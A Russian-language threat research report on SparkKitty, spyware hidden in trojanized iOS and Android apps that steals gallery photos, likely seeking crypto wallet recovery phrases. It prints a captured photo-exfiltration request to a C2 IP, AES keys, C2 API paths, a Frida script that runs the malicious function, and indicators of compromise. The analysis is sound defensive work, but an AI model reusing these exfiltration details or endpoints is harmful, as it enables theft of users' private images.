Авторы
Update 25.06.2025: компания Apple удалила вредоносное приложение из App Store.
В январе 2025 года мы раскрыли шпионскую кампанию SparkCat, нацеленную на получение доступа к криптокошелькам жертв. Злоумышленники распространяли приложения с вредоносным SDK/фреймворком, который ожидал, пока пользователь откроет определенный экран (в основном чат поддержки), а затем запрашивал права на получение доступа к галерее и при помощи OCR-модели отбирал интересующие его изображения. Хотя SparkCat поддерживал возможность искать любые слова на изображениях, в рамках вредоносной кампании злоумышленников интересовали только фотографии с фразами восстановления доступа к криптокошелькам. Тогда зловред распространялся как через неофициальные источники, так и через магазины приложений Google Play и App Store. В этот раз к нам в руки опять попал новый шпион, сумевший проникнуть в официальные магазины приложений. Предположительно, он также нацелен на криптовалютные активы жертв и связан со SparkCat. Мы назвали находку SparkKitty.
Краткая информация о новой находке:
- Зловред нацелен на устройства под управлением iOS и Android и распространяется как в дикой природе, так и в App Store и Google Play. На момент публикации компания Google уже удалила зловред.
- Вредоносная нагрузка для iOS представлена в виде фреймворков (в основном маскируется под AFNetworking.framework или Alamofire.framework) и обфусцированных библиотек, мимикрирующих под libswiftDarwin.dylib, или напрямую встроена в приложения.
- Троянец для Android существует в вариантах на Java и Kotlin; версия на Kotlin является вредоносным Xposed-модулем.
- Хотя большинство версий зловреда ворует все изображения без разбора, мы нашли смежный кластер вредоносной активности, где для отбора картинок применяется OCR.
- Вредоносная кампания ведется как минимум с февраля 2024 года.
Все началось с подозрительного магазина…
В ходе регулярного мониторинга подозрительных ссылок мы наткнулись на несколько однотипных страниц, раздающих модификации TikTok для Android, в которых из основных активностей приложения вызывался дополнительный код. Этот код запрашивал конфигурацию, которая хранилась по адресу hxxps://moabc[.]vip/?dev=az и была закодирована в Base64. Пример декодированной конфигурации приведен ниже.
|
1 2 3 4 5 6 7 8 9 |
{ "links": { "shopCenter": "https://h1997.tiktokapp.club/wap/?", "goodsList": "https://h1997.tiktokapp.club/www/?", "orderList": "https://h1997.tiktokapp.club/www/?", "reg": "https://www.baidu.com", "footbar": "https://www.baidu.com" } } |
Полученные в конфигурации ссылки отображались в приложении в виде кнопок и по нажатию открывались в WebView. По ним располагался онлайн-магазин товаров широкого потребления под названием TikToki Mall, который принимал оплату в криптовалюте. К сожалению, нам не удалось проверить, действительно ли магазин работает: для оплаты товаров необходимо пройти регистрацию, которая требует пригласительный код.
Другой подозрительной функциональности в приложениях мы не нашли, но чувство подвоха побудило нас продолжить исследование. Поэтому мы решили изучить код страниц, с которых они раздавались, и обнаружили несколько интересных деталей, указывающих на то, что они могли распространять и iOS-приложения.
|
1 2 3 4 5 6 7 |
<div class="t-name"> <div class="tit"> {{if ext=="ipa"}} <i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i> {{else}} <i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i> {{/if}} |
Способ доставки приложений на iPhone
И действительно, открыв веб-сайт с iPhone и пройдя через череду редиректов, пользователь попадает на страницу, которая небрежно имитирует App Store и предлагает загрузить приложение:
Страница загрузки iOS-версии приложения
Как известно, iOS не позволяет просто скачать и запустить любое приложение из сторонних источников. Однако Apple предоставляет разработчикам, участвующим в программе Apple Developer, так называемые provisioning-профили. Они позволяют загружать на устройство пользователя сертификаты разработчика, которые iOS в дальнейшем использует для проверки цифровой подписи приложения и определения, можно ли его запускать. Помимо собственно сертификата, в provisioning-профилях содержится его срок годности, предоставляемые приложению разрешения и прочие данные о разработчике и программе. При установке профиля на устройство сертификат становится доверенным, а подписанное им приложение — доступным для запуска.
Provisioning-профили могут быть нескольких видов. Отладочные профили используются для тестирования приложений и распространяются только на заранее заданный набор устройств. Профили App Store Connect позволяют публиковать приложения в App Store. Enterprise-профили созданы для того, чтобы организации могли разрабатывать и устанавливать на устройства своих сотрудников приложения для внутреннего пользования без публикации в App Store и без ограничений по числу устройств. Хотя участие в программе Apple Developer платное и предполагает проверку разработчика со стороны Apple, нередко Enterprise-профили используются как разработчиками программ, не подходящих для распространения в App Store (например, онлайн-казино, кряков, читов или пиратских модификаций популярных программ), так и авторами вредоносного ПО.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>AppIDName</key> <string>rdcUniApp</string> <key>ApplicationIdentifierPrefix</key> <array> <string>EHQ3N2D5WH</string> </array> <key>CreationDate</key> <date>2025-01-20T06:59:55Z</date> <key>Platform</key> <array> <string>iOS</string> <string>xrOS</string> <string>visionOS</string> </array> <key>IsXcodeManaged</key> <false/> <key>DeveloperCertificates</key> <array> <data>OMITTED</data> </array> <key>DER-Encoded-Profile</key> <data>OMITTED</data> <key>Entitlements</key> <dict> <key>application-identifier</key> <string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string> <key>keychain-access-groups</key> <array> <string>EHQ3N2D5WH.*</string> <string>com.apple.token</string> </array> <key>get-task-allow</key> <false/> <key>com.apple.developer.team-identifier</key> <string>EHQ3N2D5WH</string> </dict> <key>ExpirationDate</key> <date>2026-01-20T06:59:55Z</date> <key>Name</key> <string>syf</string> <key>ProvisionsAllDevices</key> <true/> <key>TeamIdentifier</key> <array> <string>EHQ3N2D5WH</string> </array> <key>TeamName</key> <string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string> <key>TimeToLive</key> <integer>365</integer> <key>UUID</key> <string>55b65f87-9102-4cb9-934a-342dd2be8e25</string> <key>Version</key> <integer>1</integer> </dict> </plist> |
В случае с вредоносными модификациями TikTok злоумышленники использовали именно Enterprise-профиль, о чем говорит следующий ключ в его теле:
|
1 2 |
<key>ProvisionsAllDevices</key> <true/> |
Стоит отметить, что установка любого provisioning-профиля требует непосредственного участия пользователя. Выглядит это следующим образом:
Процесс установки профиля
Искали медь, нашли золото
Установленное приложение, как и Android-версия, содержало библиотеку, встраивающую в окно профиля пользователя ссылки на подозрительный магазин, которые по щелчку открывались через WebView.
Встроенный в TikTok подозрительный магазин
Казалось бы, дело раскрыто — перед нами очередная модифицированная версия популярного приложения, пытающаяся монетизировать себя. Однако в iOS-версии нам в глаза бросилась одна странная деталь: при каждом запуске приложение запрашивало доступ к галерее пользователя — отнюдь не типичное поведение для оригинального TikTok. Более того, в библиотеке с магазином не было кода, отвечающего за обращения к галерее пользователя, и Android-версия запросов на доступ к изображениям не отправляла. Это сподвигло нас копнуть немного глубже и посмотреть на другие зависимости исследуемого приложения, что привело к обнаружению вредоносного модуля, выдававшего себя за AFNetworking.framework. Забегая вперед, сразу отметим, что в некоторых приложениях он встречался под именем Alamofire.framework, но в остальном код был тот же самый. Оригинальная версия AFNetworking имеет открытый исходный код и предоставляет разработчикам набор интерфейсов для удобной работы с сетью.
Вредоносная версия отличается от оригинальной измененным классом AFImageDownloader и добавленным классом AFImageDownloaderTool. Интересно то, что для запуска вредоносной нагрузки авторы не создавали отдельные инициализирующие функции и не изменяли экспортируемые библиотекой символы. В языке Objective-C у классов можно определить специальный селектор load, который будет автоматически вызываться на этапе загрузки приложения. В данном случае точкой входа во вредоносную нагрузку стал селектор +[AFImageDownloader load], которого также нет в оригинальной версии фреймворка.
Точка входа вредоносного класса
Выполнение вредоносной нагрузки состоит из следующих шагов.
- Проверяется соответствие значения ключа
ccoolв основном конфигурационном файле приложения Info.plist строке77e1a4d360e17fdbc. Если они различаются, вредоносная нагрузка выполняться дальше не будет. - Из файла Info.plist фреймворка достается значение ключа
ccc, закодированное при помощи base64, декодируется, а затем расшифровывается при помощи AES-256 в режиме ECB с ключомp0^tWut=pswHL-x>>:m?^.^)W(дополняется нулями до длины 32 байта). Помимо этого ключа в некоторых образцах использовалсяJ9^tMnt=ptfHL-x>>:m!^.^)A. Если в конфигурации значение ключаcccпустое или он отсутствует, зловред пробует достать зашифрованную строку по ключуcom.tt.cfиз UserDefaults — базы данных, в которую приложение может сохранять различную информацию для использования при последующих запусках. - Расшифрованное значение — набор адресов, с которых зловред скачивает очередные данные, зашифрованные тем же способом. Новый шифр-текст содержит набор С2, использующийся для отправки собранных фотографий.
- Финальный этап перед отправкой фотографий — получение разрешения со стороны сервера. Для этого используется GET-запрос по пути /api/getImageStatus, в котором передается информация о приложении и UUID пользователя. В ответ от сервера приходит следующий JSON:
Поле1{"msg":"success","code":0,"status":"1"}
codeуказывает приложению, нужно ли повторно выполнить этот запрос через некоторое время (0 — не нужно), а полеstatus— есть ли разрешение на отправку фотографий. - Далее зловред запрашивает разрешение на доступ к галерее, регистрирует себя в качестве функции обратного вызова, реагирующей на изменения в галерее, и передает на сервер те фотографии, к которым у него есть доступ и которые еще не были отправлены. Для хранения информации об уже украденных фотографиях он создает локальную базу данных. Если в процессе использования приложения в галерее произойдут изменения, оно попытается получить доступ к новым изображениям и отправить их на сервер.
Получение фотографий и их отправка
Непосредственно отправка данных осуществляется в селекторе -[AFImageDownloader receiptID:andPicID:] путем PUT-запроса на /api/putImages. Помимо самой фотографии на сервер передается информация о приложении и устройстве, а также уникальные идентификаторы пользователя:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
PUT /api/putImages HTTP/1.1 Host: 23.249.28.88:7777 Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01 Connection: keep-alive Accept: */* User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00) Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7 Content-Length: 80089 Accept-Encoding: gzip, deflate --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="appname" TikTok --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="buid" com.zhiliaoapp.musically --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="device" ios --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="userId" xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="uuid" xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="image"; filename="<name>" Content-Type: image/jpeg ......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ ....... |
Копаем глубже
Обнаружив шпиона в iOS-версии модификации TikTok, мы решили выяснить, нет ли такого же шпиона для Android. Первичный поиск вывел нас на множество приложений, посвященных криптовалютам. В их точки входа был встроен вредоносный код, который запрашивает конфигурацию с адресами С2 и расшифровывает ее с помощью AES-256 в режиме ECB. На расшифрованные адреса троянец посылает GET-запрос по пути /api/anheartbeat с информацией о зараженном приложении. В ответ он ожидает JSON, в котором поле code разрешает работу с данным С2 (разрешено при значении 0), а флаг status — отправку изображений жертвы на сервер.
Проверка С2-адресов
Основная функциональность — кража изображений из галереи — работает в два этапа. Сначала зловред проверяет значение флага status. Если оно разрешает отправку файлов, троянец проверяет содержимое файла aray/cache/devices/.DEVICES на внешнем хранилище. При первом запуске он записывает туда шестнадцатеричное число — MD5 от строки, содержащей IMEI и MAC-адрес зараженного устройства, а также случайный UUID. Содержимое файла сравнивается со строкой B0B5C3215E6D. Если оно отличается, троянец загружает изображения из галереи вместе с информацией о зараженном устройстве на командный сервер при помощи PUT-запроса на путь /api/putDataInfo, иначе — только третье изображение с конца алфавитного списка. Вероятнее всего, злоумышленники используют эту функциональность для отладки вредоносного кода.
Загрузка изображения и информации об устройстве
Позже мы нашли другие версии этого троянца, которые встраивались в приложения казино и загружались при помощи фреймворка для перехвата кода приложений LSPosed. По сути, в этих версиях троянец представлял собой вредоносный Xposed-модуль. Он перехватывал точки входа приложения и запускал там код, похожий на описанный ранее зловред, который, однако, имел несколько интересных особенностей:
- Адрес с хранилищем зашифрованных адресов С2 располагался как в ресурсах модуля, так и непосредственно в коде зловреда. При этом в общем случае это были два разных адреса, и для получения C2 использовались оба.
Процедура получения С2-адресов
- Среди расшифрованных адресов C2 выбирается самый быстрый. Для этого троянец по очереди отправляет запрос к каждому серверу и в случае успешного ответа сохраняет время, в течение которого запрос был выполнен. Среди полученных значений выбирается наименьшее. Стоит отметить, что этот алгоритм мог быть реализован и без промежуточного сохранения значений.
Поиск минимального времени ответа
- В коде присутствуют оригинальные имена классов, методов и полей.
- Вредоносный код написан на языке Kotlin. Другие найденные версии написаны на Java.
Шпион в официальных магазинах приложений
Одно из Java-приложений для Android, содержащих вредоносную полезную нагрузку, — мессенджер с функцией обмена криптовалют — было загружено в Google Play и установлено более 10 000 раз. На момент исследования оно все еще было доступно в магазине. Мы предупредили о нем Google, и зловред из магазина удалили.
Зараженное приложение в Google Play
Еще одно из найденных нами зараженных приложений для Android называется 币coin и распространяется через неофициальные источники. Однако у него есть версия для iOS — мы обнаружили ее в App Store и предупредили Apple о наличии зараженного приложения в магазине.
Страница зараженного приложения в App Store
Как в версии для Android, так и в версии для iOS вредоносная нагрузка была частью приложения, а не какого-либо стороннего SDK или фреймворка. В iOS-версии центральный класс AppDelegate, управляющий жизненным циклом приложения, регистрирует свой селектор -[AppDelegate requestSuccess:] в качестве обработчика ответов, полученных на запросы к i.bicoin[.]com[.]cn.
Проверка полученного от сервера ответа и отправка фото
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
{ code = 0; data = { 27 = ( ); 50002 = ( { appVersion = ""; cTime = 1696304011000; id = 491; imgSubTitle = ""; imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09"; imgType = 50002; imgUrl = 0; imgUrlSub = ""; isFullScreen = 0; isNeed = 1; isSkip = 1; langType = all; operator = 0; skipUrl = ""; sort = 10000; source = 0; type = 0; uTime = <timestamp>; } ); }; dialog = { cancelAndClose = 0; cancelBtn = ""; cancelColor = ""; code = 0; confirmBtn = ""; confirmColor = ""; content = ""; contentColor = ""; time = ""; title = OK; titleColor = ""; type = 3; url = ""; }; |
Здесь в качестве разрешения на отправку фотографий проверяется значение поля imgUrl (1 — разрешено). Получив добро, троянец по схожей с описанной ранее схеме скачивает зашифрованный набор C2-адресов и пытается передать изображения на один из них. По умолчанию используется первый адрес из списка. Если он недоступен, зловред переходит к следующему. Функциональность отправки фотографий реализована в классе KYDeviceActionManager:
Этапы получения и отправки фотографий
Подозрительная модификация libcrypto.dylib
В процессе исследования нам также попадались образцы, в которых присутствовала еще одна подозрительная библиотека — модифицированная версия библиотеки с криптографическими примитивами, входящей в OpenSSL (libcrypto.dylib). Она появлялась под именами wc.dylib или libswiftDarwin.dylib, содержала инициализирующие функции, обфусцированные при помощи LLVM, и ссылку на конфигурацию, которую мы ранее встречали во вредоносных фреймворках. В ней также импортировался класс PHPhotoLibrary, используемый в ранее описанных файлах для работы с галереей. Она поставлялась как в паре с вредоносным AFNetworking.framework/Alamofire.framework, так и без него.
В отличие от других вариантов зловреда, в процессе работы библиотека не обращалась к хранящейся в ней ссылке на вредоносный файл конфигурации, поэтому нам пришлось вручную искать код, отвечающий за первичную коммуникацию с C2. Несмотря на то что образцы этой библиотеки достаточно сильно обфусцированы, в некоторых из них, в частности в образце с хэш-суммой c5be3ae482d25c6537e08c888a742832, сохранились перекрестные ссылки на место в коде, где используется URL-адрес страницы с зашифрованной конфигурацией. Это функция, преобразующая строку со ссылкой в объект класса NSString:
Участок обфусцированного кода, загружающий вредоносный URL
С помощью Frida мы можем выполнить любой участок кода как функцию, но обычного преобразования строки в объект NSString недостаточно, чтобы подтвердить, что библиотека используется во вредоносных целях. Поэтому мы поднялись по перекрестным ссылкам на несколько уровней выше и, попробовав выполнить функцию, работающую со ссылкой, обнаружили, что она отправляет GET-запрос на вредоносный URL. Однако сразу получить ответ нам не удалось: сервер, на который вела ссылка, уже не работал. Чтобы функция выполнилась корректно, мы подменили ссылку при помощи Frida на рабочую, про которую точно знали, какие данные она возвращает и каким образом они расшифровываются. Установив логирующие хуки на вызов objc_msgSend и выполнив вредоносную функцию с подмененным URL, мы получили информацию об интересующих нас вызовах. Ниже представлен Frida-скрипт, при помощи которого это было сделано:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
function traceModule(impl, name) { console.log("Tracing " + name, impl); var exit_log = 0; Interceptor.attach(impl, { onEnter: function(args) { var bt = Thread.backtrace(this.context, Backtracer.ACCURATE); if (!moduleMap) { moduleMap = new ModuleMap(); } var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name); // we want to trace only calls originating from malware dylib if (modules.filter(x => x.includes('wc.dylib')).length > 0) { exit_log = 1; console.warn("\n*** entering " + name); if(name.includes('objc_msgSend')) { var sel = this.context.x1.readUtf8String(); if (sel.includes("stringWithCString:")) { var s = this.context.x2.readUtf8String(); if (s.includes('.cn-bj.ufileos.com')) { console.log("Replacing URL: ", s); var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121'); this.context.x2 = news; console.log("New URL: ", this.context.x2.readUtf8String()); } else console.log(s); } } //print backtrace console.log(bt.map(DebugSymbol.fromAddress).join("\n")); } }, onLeave: function(retval) { if (exit_log == 1) { console.warn("\n***extiting ", name); console.log(this.context.x0.readByteArray(64)); } } }); } var malInited = false; var malFunc; function callMalware() { if (!malInited) { malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []); traceModule(base.add(0x821360), 'objc_msgSend'); malInited = true; } malFunc(); } var mname = "wc.dylib"; var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base; console.log('Base address: ', base); callMalware(); |
Наши догадки подтвердились: вредоносная функция действительно загружает с заданного URL и расшифровывает конфигурацию с адресом C2, который затем использует для отправки данных об устройстве по той же схеме, что была описана ранее, и с тем же ключом AES-256. Ниже представлена выжимка из логов выполнения функции:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
*** entering objc_msgSend ### Creating NSString object with decrypted string [ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ] 0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8) 0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8) *** entering objc_msgSend ### Creating NSString with api endpoint decrypted somewhere in code [ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ] 0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50) 0x102783264 wc.dylib!0x7d3264 (0x7d3264) ### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ### *** entering objc_msgSend ### Getting server response as data object [ 0x2022d5078 initWithData:encoding: ] 0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4) 0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4) *** leaving objc_msgSend ### Server response in bytes 00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!.......... 00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success 00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us": 00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}. |
Представленный выше лог выполнения функции показывает, что в ней используется полученный из зашифрованного файла конфигурации IP-адрес, на который по пути /api/getStatus отправляются данные об устройстве с аргументами, уже знакомыми нам по предыдущим образцам. Мы также видим, что полученный от сервера ответ содержит уже известные нам поля code и status. Все это позволяет нам с уверенностью полагать, что эта библиотека также используется для кражи фотографий пользователя. Единственное, что мы пока не установили — условия, при которых вредоносная функция активируется. В начале своей работы библиотека обращается к зашифрованному в ее теле C2, отправляя информацию об устройстве и ожидая от сервера ответ в виде JSON-строки. На момент исследования мы не нашли ни одного образца, в котором содержался бы рабочий адрес С2, поэтому мы не знаем, какого точно ответа она ожидает, но предполагаем, что в нем (или в ответах на последующие запросы) должно содержаться разрешение на отправку фотографий.
Еще один кластер активности?
В ходе исследования нам удалось обнаружить большое количество страниц, с которых скачивались различные скам-приложения в формате PWA (progressive web application) для iOS. На первый взгляд эти страницы не имели никакого отношения к описанной в этой статье кампании. Однако их код был похож на код страниц, которые распространяли вредоносную версию TikTok, поэтому мы решили выяснить, как пользователи попадали на них. Поискав источники переходов, мы обнаружили рекламу различного скама и финансовых пирамид на популярных площадках.
Аккаунт скам-площадки на YouTube
Некоторые страницы с PWA содержали раздел, который предлагал пользователям скачать мобильное приложение. В случае Android по ссылке скачивается APK-файл, открывающий скам-платформу с помощью WebView.
Ссылки на скачивание приложений
Кроме открытия скама в WebView, скачиваемые APK содержат еще одну функцию. Приложения запрашивают доступ на чтение хранилища, после чего через Loader API регистрируют свой обработчик события загрузки контента. В обработчике выбираются все изображения в форматах JPEG и PNG. Эти изображения обрабатываются с помощью библиотеки Google ML Kit, позволяющей распознавать текст на картинках. ML Kit ищет блоки текста, которые затем разбивает на строки. Если нашлись хотя бы три строки, содержащие слово как минимум из трех букв, троянец отправляет изображение на сервер злоумышленников, который получает из хранилища Amazon AWS.
Фрагмент кода для загрузки фотографий
Мы со средней степенью уверенности полагаем, что этот кластер активности связан с описанным выше. Это подкрепляют следующие аргументы:
- Тематика вредоносных приложений также связана с криптовалютами.
- Используются похожие тактики: адрес С2 также расположен в облачном хранилище, похищается содержимое галереи.
- Страницы, с которых раздаются PWA для iOS, похожи на страницы, с которых скачивается вредоносный TikTok.
Основываясь на том, что два кластера активности связаны, мы полагаем, что авторы описанных ранее приложений также могли распространять их через рекламу в социальных сетях.
Цели кампании
Хотя, в отличие от SparkCat, в описанных нами шпионах отсутствовали прямые признаки, указывающие на заинтересованность злоумышленников в криптоактивах жертв, мы все же предполагаем, что они воруют фотографии именно с этой целью. На эти мысли нас наталкивают следующие детали.
- Вместе со шпионом в приложение TikTok был встроен магазин, принимающий оплату товаров только в криптовалюте.
- Некоторые приложения, в которые был встроен шпион, так или иначе имели отношение к теме криптовалют. Как пример — 币coin в App Store, позиционирующий себя как приложение для отслеживания актуальной информации о криптовалютах, или мессенджер SOEX с поддержкой различных «криптовалютных» функций.
- Основной источник распространения шпиона — однообразные платформы для загрузки приложений. В процессе поиска нам удалось найти достаточно большое количество доменов, раздающих не только описанного троянца, но и PWA (прогрессивные веб-приложения), на которые пользователи попадали через сайты различных криптовалютных скам-площадок и финансовых пирамид.
По нашим данным, злоумышленники в основном были нацелены на пользователей из Юго-Восточной Азии и Китая. Обнаруженные зараженные приложения в большинстве своем представляли различные китайские азартные игры, модификации TikTok, порноигры. Все эти приложения изначально были ориентированы именно на пользователей из вышеперечисленных регионов.
Более того, мы полагаем, что зловред связан с кампанией SparkCat, и вот почему:
- Некоторые Android-приложения, зараженные SparkKitty, были собраны при помощи того же фреймворка, что использовался для сборки приложений, зараженных SparkCat.
- В обеих кампаниях мы встречали одинаковые зараженные Android-приложения.
- Во вредоносных iOS-фреймворках сохранились отладочные символы, в том числе пути в файловой системе злоумышленников, по которым располагались собираемые ими проекты. Эти пути совпадают с теми, что мы видели в SparkCat.
Заключение
Злоумышленники продолжают захватывать официальные магазины приложений, причем не только для Android, но и для iOS. Обнаруженная нами шпионская кампания использует различные векторы распространения: как зараженные вредоносным фреймворком/SDK программы, раздающиеся с неофициальных ресурсов, так и вредоносные приложения в App Store и Google Play. Хотя с технической и концептуальной точки зрения кампанию нельзя назвать сложной, она продолжается по меньшей мере с начала 2024 года и представляет большую угрозу для пользователей.
В отличие от ранее обнаруженного шпиона SparkCat, SparkKitty не избирателен в том, какие фотографии из галереи он ворует. Несмотря на то что, по нашим предположениям, основная цель злоумышленников — поиск скриншотов с фразами восстановления доступа к криптокошелькам, на украденных изображениях могут быть и другие конфиденциальные данные.
Судя по источникам распространения, шпион преимущественно нацелен на пользователей из Юго-Восточной Азии и Китая, но при этом в нем нет ограничений на работу с пользователями из других регионов.
Наши защитные решения детектируют вредоносные программы, связанные с этой кампанией, со следующими вердиктами:
- HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
- HEUR:Trojan-Spy.IphoneOS.SparkKitty.*
Индикаторы компрометации
Зараженные Android-приложения
b4489cb4fac743246f29abf7f605dd15
e8b60bf5af2d5cc5c501b87d04b8a6c2
aa5ce6fed4f9d888cbf8d6d8d0cda07f
3734e845657c37ee849618e2b4476bf4
fa0e99bac48bc60aa0ae82bc0fd1698d
e9f7d9bc988e7569f999f0028b359720
a44cbed18dc5d7fff11406cc403224b9
2dc565c067e60a1a9656b9a5765db11d
66434dd4402dfe7dda81f834c4b70a82
d851b19b5b587f202795e10b72ced6e1
ce49a90c0a098e8737e266471d323626
cc919d4bbd3fb2098d1aeb516f356cca
530a5aa62fdcca7a8b4f60048450da70
0993bae47c6fb3e885f34cb9316717a3
5e15b25f07020a5314f0068b474fff3d
1346f987f6aa1db5e6deb59af8e5744a
Зараженные iOS-приложения
21ef7a14fee3f64576f5780a637c57d1
6d39cd8421591fbb0cc2a0bce4d0357d
c6a7568134622007de026d22257502d5
307a64e335065c00c19e94c1f0a896f2
fe0868c4f40cbb42eb58af121570e64d
f9ab4769b63a571107f2709b5b14e2bc
2b43b8c757c872a19a30dcdcff45e4d8
0aa1f8f36980f3dfe8884f1c6f5d6ddc
a4cca2431aa35bb68581a4e848804598
e5186be781f870377b6542b3cecfb622
2d2b25279ef9365420acec120b98b3b4
149785056bf16a9c6964c0ea4217b42b
931399987a261df91b21856940479634
Вредоносные iOS-фреймворки
8c9a93e829cba8c4607a7265e6988646
b3085cd623b57fd6561e964d6fd73413
44bc648d1c10bc88f9b6ad78d3e3f967
0d7ed6df0e0cd9b5b38712d17857c824
b0eda03d7e4265fe280360397c042494
fd4558a9b629b5abe65a649b57bef20c
1b85522b964b38de67c5d2b670bb30b1
ec068e0fc6ffda97685237d8ab8a0f56
f10a4fdffc884089ae93b0372ff9d5d1
3388b5ea9997328eb48977ab351ca8de
931085b04c0b6e23185025b69563d2ce
7e6324efc3acdb423f8e3b50edd5c5e5
8cfc8081559008585b4e4a23cd4e1a7f
Вредоносные обфусцированные iOS-библиотеки
0b7891114d3b322ee863e4eef94d8523
0d09c4f956bb734586cee85887ed5407
2accfc13aaf4fa389149c0a03ce0ee4b
5b2e4ea7ab929c766c9c7359995cdde0
5e47604058722dae03f329a2e6693485
9aeaf9a485a60dc3de0b26b060bc8218
21a257e3b51561e5ff20005ca8f0da65
0752edcf5fd61b0e4a1e01371ba605fd
489217cca81823af56d141c985bb9b2c
b0976d46970314532bc118f522bb8a6f
f0460bdca0f04d3bd4fc59d73b52233b
f0815908bafd88d71db660723b65fba4
6fe6885b8f6606b25178822d7894ac35
Ссылки для загрузки зараженных приложений
hxxps://lt.laoqianf14[.]top/KJnn
hxxps://lt.laoqianf15[.]top/KJnn
hxxps://lt.laoqianf51[.]top/KJnn
hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
hxxps://xt.xinqianf38[.]top/RnZr
Страницы, распространяющие троянцев
hxxps://accgngrid[.]com
hxxps://byteepic[.]vip
C2 и хранилища для конфигурации
C2:
23.249.28[.]88
120.79.8[.]107
23.249.28[.]200
47.119.171[.]161
api.fxsdk[.]com
Конфигурации:
hxxp://120.78.239[.]17:10011/req.txt
hxxp://39.108.186[.]119:10011/req.txt
hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh
hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK
hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121
hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu
hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json
hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2
hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2
hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
Пути
/sdcard/aray/cache/devices/.DEVICES
Авторы
От тех же авторов
В той же категории
SparkKitty, младший брат SparkCat: новый шпион в App Store и Google Play